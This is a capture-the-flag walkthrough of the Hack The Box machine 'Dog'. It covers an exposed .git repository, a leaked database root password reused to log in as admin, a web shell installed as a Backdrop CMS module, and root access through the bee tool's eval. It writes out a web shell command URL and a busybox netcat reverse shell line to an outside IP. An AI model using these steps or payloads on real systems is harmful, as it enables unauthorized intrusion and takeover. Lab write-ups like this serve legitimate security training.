Dog (HTB)
WHAT THE DOG DOING
Intro
Welcome everyone to new season HTB machine let's GO INTO IT.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8=
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
| 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelFrom the nmap scan we can see .git file flaying out there let's check the web first and see what we have.
So i take a look around the app and download the .git file using the git-dumper tool.
git-dumper http://dog.htb/.git gitI search through the files and found this interesting db info.
After long analysis i have identify a user.
If we test this in the login page we can see that its valid but the password is wrong.
I also found a DB password in the settings file from the git we install.
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';But it does not work, I also did some brute-forcing but also no luck. So i decided to go back so search among the files until i found new user.
So i tested the same password we found with this user and indeed it work this time.
Shell as www-data
So after we got access to the dashboard we can see that we are an administrator user.
After simple search i was a ble to find a vulnerablitiy what would allow us to execuet commands on the server.
This is a good source we can use and there is the one below too but this one does not work becuase the server does not accept .zip it accepts .tar files.
With this info using the payload from the git repo we can do this to use the shell.
Then we choose our file.
After click on install and install the module sucsssuly we then navigate to here.
http://dog.htb/modules/reference/shell.php?cmd=whoam["command"]With this we can execute command on the server i used this payload to gain shell.
http://dog.htb/modules/reference/shell.php?cmd=busybox+nc+10.10.16.68+8899+-e+shjust change your info accordingly.
Shell as johncusack
After we got shell as www-data i tried to search around i remembered the database credentials we found earlier i check the database hashes and attempt to crack them.
But no luck.
then i tried to reuse the same password we found for the db and it actually works.
Shell as root.
Once i got access to johncusack i checked his permissions and found that he is able to run prgram called bee as root. But what is bee.
Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites, performing actions like:
Running cron
Clearing caches
Downloading and installing Backdrop
Downloading, enabling and disabling projects
Viewing information about a site and/or available projects
So this tool help us to intrecat with the backdrop CMS. Ok cool but what we can do with it. by running the help menu we can see a lot of command but few seems interesting.
So there two command help us to run php code which can allow us to execute shell commands i tried them but i keep encounter this error.
Basically it give on every command i tried. Just note aside i have login via SSH.
I search a lot but i did not find a clear answer until i tried to navigate to the BackDrop home folder. which under.
/var/www/htmli tried to run the same command i got something finally.
From here it so simple to get root shell i tried to create PHP file with some system command in it but it did not allow me.
So if it does not allow for a file what about eval ???.
and as simple as that we got Root shell.
Closing thoughts
This machine was an easy machine but i spend a lot of time searching for the second user we found it actually kind hard to find it but we can say its a lesson for future machines and future STUFF. The privilege escalation was so simple either to the first user or to root just some tricks here and there the rest is so simple. Thank you for reading :).
Last updated